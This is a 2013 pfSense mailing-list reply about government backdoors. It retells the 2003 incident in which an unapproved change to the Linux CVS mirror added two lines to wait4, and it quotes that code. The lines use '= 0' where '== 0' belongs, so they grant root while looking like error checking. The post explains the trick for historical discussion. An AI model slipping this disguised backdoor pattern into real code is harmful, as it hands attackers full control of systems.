On Oct 9, 2013, at 7:36 PM, Thinker Rix <thinke...@rocketmail.com> wrote:
> On 2013-10-09 20:04, Walter Parker wrote:
>> About that made in the USA thing, the NSA has deals with overseas companies
>> as well...
>>
>> Plus, the GCHQ and several other foreign spy agency's have done similar
>> things, so if you starting asking, you discover that the major governments
>> are trying to do this and have succeed more often than we would like.
>
> Yes, it is horrifying.
>
>> Also, the whole "We have to ask to ask the question to get the denial on
>> record" only matters for the government or people with lots of money. The
>> Government can sue you/arrest you for a lie, but do "you" have enough money
>> to pay for lawsuits against a company? Most lawyers want money upfront
>> unless you have clear suit against a company with lots of money.
>>
>> When was the last (or even first time) that a company was sued and lost to a
>> private party for something like this, outside of class action lawsuits
>
> I do not want to sue or otherwise harm anybody.
>
> I only asked a very simple question and now read the answers. Very
> interesting answers, I think.
Not interesting, just simple ego stroking.
As for those who want to read the source to find bugs …
Back in 2003 Linux used a system called BitKeeper to store the master copy of
the Linux source code. If a developer wanted to propose a modification to the
Linux code, they would submit their proposed change, and it would go through an
organized approval process to decide whether the change would be accepted into
the master code. Every change to the master code would come with a short
explanation, which always included a pointer to the record of its approval.
But some people didn’t like BitKeeper, so a second copy of the source code was
kept so that developers could get the code via another code system called CVS.
The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the
CVS copy that did not have a pointer to a record of approval. Investigation
showed that the change had never been approved and, stranger yet, that this
change did not appear in the primary BitKeeper repository at all. Further
investigation determined that someone had apparently broken in (electronically)
to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change
modified the code of a Linux function called wait4, which a program could use
to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual
about this code? Answer appears below.]
A casual reading by anyone less than expert would interpret this as innocuous
error-checking code to make wait4 return an error code when wait4 was called in
a certain way that was forbidden by the documentation. But a really careful
(and somewhat) expert reader would notice that, near the end of the first line,
it said “= 0” rather than “== 0”. The normal thing to write in code like this
is “== 0”, which tests whether the user ID of the currently running code
(current->uid) is equal to zero, without modifying the user ID. But what
actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the
“root” user, which is allowed to do absolutely anything it wants—to access all
data, change the behavior of all code, and to compromise entirely the security
of all parts of the system. So the effect of this code is to give root
privileges to any piece of software that called wait4 in a particular way that
is supposed to be invalid. In other words … it’s a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking,
but it’s really a back door. And it was slipped into the code outside the
normal approval process, to avoid any possibility that the approval process
would notice what was up.
Could this have been an NSA attack? Maybe. But there were many others who had
the skill and motivation to carry out this attack. Unless somebody confesses,
or a smoking-gun document turns up, we’ll never know.
We still dont have a report on the kernel.org hack of 2011. Why not?
Many people say, "calm down, its git they can’t have inserted backdoors etc
without messing up the git history/changelog/hashes/whatever". But what if git
was modified and backdoored previously to hide some objects/changes? How would
such an attack work? Lets say you discover a problem in git, which allows you
to omit changesets in its output. How would that work to backdoor the kernel?
Older versions of git would tell you the hashes were wrong. Implementations of
git in other languages would tell you the hashes were wrong. Manually checking
would tell you the hashes were wrong. It's just not feasible. Plus, git is
stored in git, so you'd need to backdoor git first... ;)
Also, the source of git would also reveal a problem when examined. To get
around that one starts hypothesizing the sort of globe-spanning conspiracy
against which one might as well give up ("well, maybe all my compilers (not
just gcc, all of them) are also backdoored to backdoor themselves, and each
other if you cross-compile, then backdoor git too...”).
pfSense is based on FreeBSD. What if FreeBSD was backdoored by the NSA or
other? How would you know?
See? just useless ego stroking, and a lot of resultant heat, rather than
solutions to problems.
Can we get back to pfSense now?
Jim
_______________________________________________
List mailing list
List@lists.pfsense.org
http://lists.pfsense.org/mailman/listinfo/list
